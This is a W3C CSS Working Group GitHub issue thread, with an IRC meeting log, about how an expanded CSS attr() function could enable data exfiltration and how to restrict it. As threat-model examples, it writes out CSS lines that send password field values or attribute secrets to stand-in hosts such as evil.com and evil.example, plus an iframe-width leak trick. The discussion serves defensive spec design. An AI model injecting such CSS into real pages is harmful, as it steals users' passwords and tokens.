[css-values] Security concerns regarding attr()

xiaochengh commented 4 years ago

The CSS values spec basically says there's no security concerns:

This specification mostly just defines units that are common to CSS specifications, and which present no security concerns.

In the Blink Intent to Implement and Ship: Advanced attr() thread, multiple concerns have been raised that attr() can be used as a tool for data exfiltration of sensitive data like passwords, nonce, etc.

And it's a much easier-to-use weapon compared to attribute selectors, which has to exfiltrate attribute value character-by-character in an iterative/recursive manner.

Other than "try harder to block CSS injection", do we have other ideas to address the security concerns? For example, blacklisting certain attributes (e.g., nonce, value, etc.), or even whitelisting attributes allowed in attr() (as suggested by @mikewest here)?

Loirooriol commented 4 years ago

See #2426 and #2339. TLDR: Third party CSS is not safe.

arturjanc commented 4 years ago

Please note that @mikewest explicitly referred to the known concerns about third-party CSS in the intent thread and explained how the proposed expansion in expressive power of attr() is qualitatively different in this message.

One specific problematic case are sites which allow user-controlled style= attributes with lightweight CSS sanitization. IIUC currently this doesn't allow any of the classic exfiltration vectors because:

In a style= attribute you cannot use CSS3 attribute selectors, @import or other at-rules.
Currently, attr() works only in the content property which is limited to ::before and ::after pseudoelements.

If attr() starts working in this case, it can make sites with this pattern vulnerable because it will allow untrusted CSS to access attributes values which otherwise wouldn't be exposed.

Note that this is just one example. Another consideration is the fact that many websites' Content Security Policy rules are more lax when it comes to permitting styles than scripts, so making CSS-based exfiltration of DOM contents easier will allow bypassing existing CSPs.

From a security perspective, I'd strongly favor allowlisting attributes permitted in attr() in order to mitigate these risks.

faceless2 commented 4 years ago

Above links are all 404 for me - the discussion appears to be the one at https://groups.google.com/a/chromium.org/forum/#!topic/blink-dev/FGCgsKmylhw

MatsPalmgren commented 4 years ago

Currently, attr() works only in the content property which is limited to ::before and ::after pseudoelements.

It's not limited to ::before/::after. The spec for the content property says:

Applies to: all elements, tree-abiding pseudo-elements, and page margin boxes

It's not implemented for (non-pseudo) elements yet in any UAs as far as I know, but at least Gecko supports it on ::marker (and we intend to support it on all elements at some point).

I don't think that changes the security aspects though, since it would still be considered generated content; same as for pseudos.

arturjanc commented 4 years ago

Thanks, @faceless2 -- I updated the link in my reply above.

faceless2 commented 4 years ago

div {
    content: url(file.png);
}

is valid CSS, and already works on Gecko and Blink (the distinction is between "content-replacement" and "content-list" in the definition of the "content" property - the former (which maps to <image>) applies to all elements, not just pseudo-elements).

But as attr() on a pseudo-element resolves against the element anyway, I'm not sure it makes any difference in terms of risk.

div::before {
    content: url(attr(secret));
    content: attr(secret url);
}

are presumably the kind of cases causing concern in the original posts. Both should be valid according to the spec, but this syntax doesn't work in any browser yet.

As there's no ability to concatenate in CSS, these would become a relative URL resulting in a request to the server that supplied the HTML (or, perhaps, the stylesheet, depending on the outcome of https://github.com/w3c/csswg-drafts/issues/5079). So you couldn't send a request just anywhere.

Personally I've no opinions on what to do about this, other to say that attr(nnn url) for any nnn seems quite useful to me, and it would be a shame to lose it. And also that this should probably tip any resolution of https://github.com/w3c/csswg-drafts/issues/5079 towards the attribute being resolved against the origin of the HTML, not the origin of the CSS.

Crissov commented 4 years ago

Does attr() return the attribute value as specified in static HTML or as set by dynamic JS?

Loirooriol commented 4 years ago

@Crissov It's the attribute in the current DOM, which can come from original HTML source or set in JS. But e.g. if you change the value IDL attribute of an <input> element, the value DOM attribute will not reflect that change (it would for the defaultValue IDL attribute).

xiaochengh commented 4 years ago

Re @arturjanc

From a security perspective, I'd strongly favor allowlisting attributes permitted in attr() in order to mitigate these risks.

There's a compatibility concern, since attr() on pseudo-element content is already widely used, and there's no restriction to which attributes are allowed at all. From a github search result, the choice of attribute used in attr() seems arbitrary.

How about disallowing attr() on certain elements? For example, no attr() on form control elements, <script>, <style>, <link>, etc.

arturjanc commented 4 years ago

As there's no ability to concatenate in CSS, these would become a relative URL resulting in a request to the server that supplied the HTML (or, perhaps, the stylesheet, depending on the outcome of #5079). So you couldn't send a request just anywhere.

That's a great illustration of the security issue this feature runs into: currently, browsers (at least Chrome and Firefox) resolve relative URLs based on the location of the stylesheet, not the loading document. So any CSS injection could just use @import url(//evil.example) and then in the malicious stylesheet exfiltrate the contents of all attributes on the page via url(attr(secret)), which would send requests to evil.example/<attribute-value>.

Currently, attackers can still query against the contents of attributes with CSS3 selectors, but that's a single-bit information leak, requiring thousands of requests (and recursively adding new stylesheets to the page) to exfiltrate something like a CSRF token. This makes such attacks more difficult to conduct in practice, and makes them more time-consuming, increasing the chance that a user would navigate away from the page before the attacker can leak the secret. Giving attr() more capabilities as proposed here would allow direct exfiltration of all attribute values on a page with a single injected stylesheet, substantially increasing the security impact of CSS injections.

I don't think disallowing this on certain elements is sufficient, given the large amount of data modern applications have in data-* attributes, URLs, and attributes on custom elements. The only safe solution I can think of would be to allowlist attributes such as data-css-*; of course existing use of attr() in the content property could be exempt from that.

tabatkins commented 4 years ago

So I think #5079 should be resolved how Anne suggests, which would conveniently also remove the ability to exfiltrate arbitrary data to an arbitrary origin via attr(foo url). I think that, for now, brings us back to the existing status quo, and so should unblock the new attr() from shipping. (You can't write url(attr(...)) at all (it'll parse as a bad-url-token and make the property invalid, see the Syntax spec), so there's no concern there for any value currently.)

However, when we introduce a string concatenation function, and a url() variant that can take functions, then input[type=password]{background-image: fetch(concat("https://evil.com/data-stealing?pw=", attr(value string))); } will work and accomplish the same thing. And this exact use-case (not pw stealing; concating an attr and a url fragment to select an image) was brought up as one of the justifications for adding string concatenation, so this is unfortunate.

I think that, separately, we should pursue what Mike West suggested in the ItS thread, and block certain sensitive attributes from being visible to CSS at all - nonce, the value of any form input, etc. I'll open a different bug for that.

faceless2 commented 4 years ago

There's no way to pull an attribute value from an element other than the one you're styling, and I've been unable to apply any sort of style to <script> and <style> while testing - no matter what I did they remained as display:none, which means that generating content within them that contains an attribute value would be impossible even if attr() were fully implemented.

I presume this was by design, but I'm not sure where it's specified.

tabatkins commented 4 years ago

You can absolutely display script and style; you might be overlooking that head is display:none by default as well. ^_^

tabatkins commented 4 years ago

And "hide sensitive attributes from CSS entirely" is now #5136.

faceless2 commented 4 years ago

I was about to reply - confidently - that I didn't put them in the head, until I recalled I was testing them as with an online thingy like codepen. So now I'm not so confident :-) Please ignore my previous.

arturjanc commented 4 years ago

I like the idea from https://github.com/w3c/csswg-drafts/issues/5136, let's continue the discussion about restricting CSS attribute access there.

The one thing I'd like to stress here is that exfiltration via url() is just one example that illustrates the security concerns, and that there are several other ways to abuse the new attr(). Consider something like <iframe data-userid="1234567" src="//adnetwork.example">; a limited CSS injection on the page could set iframe { width: attr(data-userid) } and have the parameter read via window.innerWidth in the frame (even with a locked down Content Security Policy which prevents loading external CSS and exfiltrating attribute values with CSS3 selectors).

Basically, I'm worried that there's a fairly large set of existing CSS features that would enable leaks in existing applications when attr() starts applying to arbitrary properties.

arturjanc commented 1 year ago

For other folks interested in this issue, we recently had a discussion about a safe path forward for attr() in https://github.com/web-platform-tests/interop/issues/86#issuecomment-1316955804 and the comments above.

As a brief summary, IMHO preventing the use of attr() inside url() by default but allowing it via a per-element opt-in (e.g. requiring explciitly marking certain elements/attributes as visible to CSS) might be a reasonable balance between usability and security. We'd still have issues with other attribute types (like the one mentioned directly above in https://github.com/w3c/csswg-drafts/issues/5092#issuecomment-636452209), but they seem less likely to cause security problems in practice, so I'm less worried about these.

tabatkins commented 1 year ago

The opt-in sounds pretty good to me. Should this be very strictly on the referenced element itself, or would it be okay to put it on an ancestor and have it apply to an entire subtree (and, if placed on html, the entire document)? Tons of attribute repetition isn't great if the referenced elements occur a bunch on the page.

ExE-Boss commented 1 year ago

Note that it’s not possible to use any CSS function inside url(…) since it’s a legacy thing which always parses its first argument as a raw string: https://drafts.csswg.org/css-syntax/#consume-a-url-token

Loirooriol commented 1 year ago

Good point, but the concerns still apply to src().

arturjanc commented 1 year ago

Should this be very strictly on the referenced element itself, or would it be okay to put it on an ancestor and have it apply to an entire subtree (and, if placed on html, the entire document)?

There's probably no single right answer here. There's a risk that developers will add the attribute on html and accidentally allow CSS access to sensitive values throughout the DOM (it's difficult to reason about this because it requires understanding the meaning of every value in every attribute in the DOM). At the same time, this would be safe by default, i.e. only applications that add the attribute would allow such access, and we could add a spec/documentation note explaning the considerations.

Personally, I'd be okay with inheriting this bit from an ancestor element given that this design wouldn't result in a security regression for existing applications (at most, it's a sharp edge that developers would need to take into account when adding the attribute).

tabatkins commented 11 months ago

There's been more attention on attr() lately in Interop 2024 discussions, so I have a proposal to move forward with this for now without requiring us to fully resolve the security concerns immediately. (Resolving them would be great, of course; I'd just like to decouple the safe usages from progress on that front.)

Drop the "url" type entirely for now.
Strings produced by attr() (either directly thru the "string" type, or indirectly thru future stringifying/concatenating functions that can take a non-string attr()) are marked as "attr()-tainted" and can't be used as url strings. (That is, can't be passed to src(), to image(), etc.)
We separately pursue something like the attr allowlisting approach outlined in https://github.com/web-platform-tests/interop/issues/86#issuecomment-1316955804, which'll untaint attr() produced from the given attributes and allow the "url" type to be used for those attributes.

This'll allow all the safe usages of attr() (anything you want to do within the page) while blocking any exfiltration potential for now, and then future work will allow us to safely exfil expected data only.

tabatkins commented 11 months ago

Augh tho, I forgot about the attack scenario outlined in https://github.com/w3c/csswg-drafts/issues/5092#issuecomment-636452209 (using an attr() to shift a value into a property that's observable from within a third-party iframe, like width).

Can't even just disallow attr() usage on such elements; depending on the styles of the rest of the page, you might be able to do the shift on a parent element and have layout convey the value down to the iframe.

tabatkins commented 5 months ago

All right, after internal discussion with @arturjanc , the conclusion from Chrome's security people is that attr() is likely acceptable from a security standpoint to reference arbitrary attributes, so long as it's not used as a url (which just makes it too trivial to exfiltrate potentially-sensitive attribute data, like security tokens). I've modified the spec accordingly.

Assuming this seems reasonable, I'll separately pursue an HTML PR to add some sort of allowlist attribute, which'll remove that restriction from attr() on the element and its descendants.

faceless2 commented 5 months ago

The most common use I have seen for attr() in print-focused CSS engines is constructions like

a::before { content: target-text(attr(href url));

In all these cases the URL is relative. Would relative URLs be acceptable from a security standpoint?

Crissov commented 5 months ago

Should printouts be affected by restrictions at all?

arturjanc commented 5 months ago

I think the proposal is just to restrict attr() in url() (or any similar functions) so this shouldn't affect the pattern mentioned above.

But to answer the question about relative URLs: unfortunately that would still be concerning from a security perspective because of the ubiquity of open redirects across the web, which allow a relative (same-origin) URL to end up making a request to an external destination. This would allow the exfiltration of data from the DOM on origins which have open redirects.

cdoublev commented 4 months ago

Nit:

Doing so makes the property it’s used in invalid.

Should background-image: src(attr(foo)) be invalid at parse time and --foo: attr(foo); background-image: src(var(--foo)) at computed value time, or should both cases be invalid at computed value time?

There is a typo in Example 9: background-image(src(var(--foo))).

tabatkins commented 4 months ago

@faceless2 As @arturjanc said, the restriction is on using the value in a URL, not using the value from a URL attribute to do something else. Your example is totally fine. (And also, generally, print media can probably ignore this restriction since it's not including untrusted 3rd party CSS and loading URLs dynamically with ambient authority.)

@cdoublev Yes, the former. Standard validity rules, so the first is invalid at parse time, and the second is "invalid at computed-value time" since it fails to parse after substitution.

cdoublev commented 4 months ago

An URL can be specified as a <string> in some productions. If I did not miss any, in filter(), image(), and image-set().

You might want to clarify it:

- attr() is not allowed to be used in any <url> value,
+ attr() is not allowed to be used as a <string> representing an URL value,

attr(foo) can represent an URL or a gradient in background-image: filter(attr(foo), opacity(1)), or a color in background-image: image(attr(foo)): should these cases be invalid at computed value time?

andruud commented 3 months ago

The security restrictions as proposed are problematic to implement.

As @cdoublev points out, it's not obvious if something should be invalid parse time or at computed-value time. All it takes is a grammar like <color> || <string>, and you don't know if an attr() is valid in that spot until after substitution. We should treat attr() exactly like var(), i.e. always making it valid at parse time.

Also, we should probably specify (for simplicity) that any attr() substituted into a custom property causes the whole custom property value to be attr()-tainted. Otherwise we need some complicated way of tracking tainted parts of values through var()-chains.

But even with that, this will be kind of horrible. The spec says that attr() is not valid within <url> values, but var()/attr() is substituted on the "raw" token stream / input string level, before being passed to the property parser. There is no concept of <url> during substitution. I think we'd either have to parse and substitute at the same time (interleaved with each other), or basically do per-token tainting, and both of those are kind of big asks ... I'm not sure we can do it without regressing general performance too much.

I suppose we can try, but we should make the two modifications I mentioned above to give the proposal the best chance of successful implementation.

If I did not miss any, in filter(), image(), and image-set().

Yes, please, let's be more specific about where attr() is invalid.

css-meeting-bot commented 3 months ago

The CSS Working Group just discussed [css-values] Security concerns regarding attr().

The full IRC log of that discussion

<jarhar> TabAtkins: theres been discussion since 14 hours ago i did not see. well lets just intro the thing and we'll ? conclusions from this because we'll need more discussions
<jarhar> TabAtkins: when we ? the attr function to parse values to things other than strings, there was a concern from security folks that this made a new exfiltration hack which you could take an attribute that stores ? parse that into an integer, put that into a url via the src syntax and then you can send any arbitrary attribute value out to hostile
<jarhar> server
<jarhar> TabAtkins: so, while most cases that use that are fine and we dont want to lock this down in some crazy way, we wnat to prevent it from doing this sort of thing. i have a rpoposal in the spec, disallowing attr values from being used to build urls
<jarhar> TabAtkins: that persists though ? changes, basically change the value and you cant use that value in a url ever
<jarhar> TabAtkins: requested review a while ago, anders said ? back, so i just want to say i would love others to review unless anders you know something that would be good to share
<jarhar> TabAtkins: otherwise we can just call it good
<jarhar> andruud: we can discuss in the issue
<jarhar> astearns: anyone with questions?
<miriam> q+
<astearns> ack miriam
<jarhar> miriam: i just wanted to say that i like movign towards an attr that we can actually ship so i support this process
<bramus> +10000
<lwarlow> q+
<jarhar> astearns: we'll take this back to the issue and i will re-add the agenda issue later
<astearns> ack lwarlow
<jarhar> lwarlow: if youve got the ability to - if the if check was that specific to custom properties? if you have conditionals and you can assign the attr value and then assign that into a variable where you can do stuff not in the url but ?
<jarhar> TabAtkins: i dont know the implications of that right now, but the tainting would have to be fairly wide
<jarhar> TabAtkins: lets discuss this in the issue, ?
<jarhar> iank_: anders your concern would go away if you like wholesale tainted attrs for any properties that accepted url type things right?
<jarhar> andruud: yes
<jarhar> andruud: that would make it easier but i assume that would be too limiting, wouldn't be able to use it inside a gradient or background image
<jarhar> andruud: so i think thats not a good
<jarhar> andruud: i was wondering tab, attr now becomes yet another invalid at computed value time thing. if you use it anywhere it becomes ? at parse time
<jarhar> TabAtkins: that is separate from security. it introduces ?
<jarhar> andruud: have you considered leaving it as its been discussed ?? the attr has height inline in the fn, so we could interpet that type during the regular parse time
<jarhar> TabAtkins: yes but getting every place that accepts numbers to calc, doing that same parser genericness for all types sounds like a much more annoying issue
<emilio> can confirm :)
<jarhar> TabAtkins: theres stil. places you can put a number in but not a calc in css
<emilio> q+
<jarhar> TabAtkins: parse ? written by hand instead of generatables ? treat it like a link
<jarhar> andruud: security, would be easier to say oh when youre trying to aprse a string in this situation after its invalid vs the security restrictions you can put in vs this proposal ?
<jarhar> TabAtkins: ignoring what the type of the attr is, the type of the attr can ? some attribute value. the attribute value doesn' tparse as that type and thats what you need ? for
<jarhar> andruud: ok but you could define fallback, which so the attr is parsed as an attr value and then during the regular parse time and then computes to something computed value tie, and if it doesn't match then take the falback
<jarhar> TabAtkins: yes, if we require a falback
<jarhar> astearns: ?
<jarhar> TabAtkins: it allows a fallback, but overall the treating attrs different froma registered custom property doens't get us much. you can declalrae as an integer and youll get ? behavior
<jarhar> andruud: im not opposed to using subsitution behavior
<jarhar> TabAtkins: subsitution is much easier than ?
<astearns> ack emilio
<jarhar> emilio: to clarify what tab said, its not about parsing it also about storing and making every property ? rather than at a single place, right? its the same thing, at least on geckos side thats the main issue with supporting arbitrary unit inside calc because suddently stuff that used to be a double now its like a tree of objects that you need to
<jarhar> defer computation, so either ? introduce this kind of thing unless you do it at the ? time
<jarhar> andruud: we have the same issue but we have to work on that. ? sibling index, sine function, progress functions, so we have to do it anyway i think
<jarhar> TabAtkins: ? numeric proeprty ? every value
<jarhar> emilio: i agree that its kind of - we've been thinking ? this road for a long time, feels like a huge amount of work
<emilio> s/thinking/kicking this can down the road/
<jarhar> TabAtkins: any other comments or can we close this issue?
<jarhar> astearns: lets take this back to the issue

andruud commented 2 months ago

any attr() substituted into a custom property causes the whole custom property value to be attr()-tainted

Hmm, on second thought, this would make normally-valid things invalid just because of indirection via a custom property. It wouldn't be ideal.

w3c / csswg-drafts

[css-values] Security concerns regarding attr() #5092